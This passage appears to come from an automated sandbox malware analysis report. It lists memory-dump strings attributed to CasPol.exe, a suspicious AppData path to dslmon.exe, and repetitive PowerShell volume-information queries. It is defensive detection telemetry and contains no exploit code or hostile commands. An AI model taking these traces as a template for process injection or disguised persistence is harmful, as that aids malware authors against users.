00000010.00000003.267296199956.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267010333985.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266822361681.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267303192324.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266814096224.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267299000810.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267081739212.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267132189535.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266991101692.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266833230991.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266835254253.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267075538002.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134553631.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266996130718.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267122511378.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267162084985.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267031293588.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267176767839.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267008195889.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267482584167.00000000208F4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267159374349.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266789023399.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266970735507.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267172132004.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267378195452.00000000208F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerAppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe
Source: CasPol.exe, 00000010.00000003.266998257248.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266904811077.00000000208D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266986587280.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267090177582.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267092100473.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267381718592.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266791092513.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267166482776.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267396598244.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267039466145.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267034179578.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266796450678.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267093672541.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266798896933.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266720174861.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267003703455.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267066755846.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267036338977.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267386131376.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 
00000010.00000003.267293066249.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267303192324.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267142396446.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266682544408.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267096212102.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267042082868.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267075538002.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134553631.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266976192586.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266996130718.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267122511378.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267162084985.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267031293588.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267176767839.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267008195889.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267069401168.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266842181155.00000000208D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267159374349.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266983611905.00000000208FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerm32\cmd.exe

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
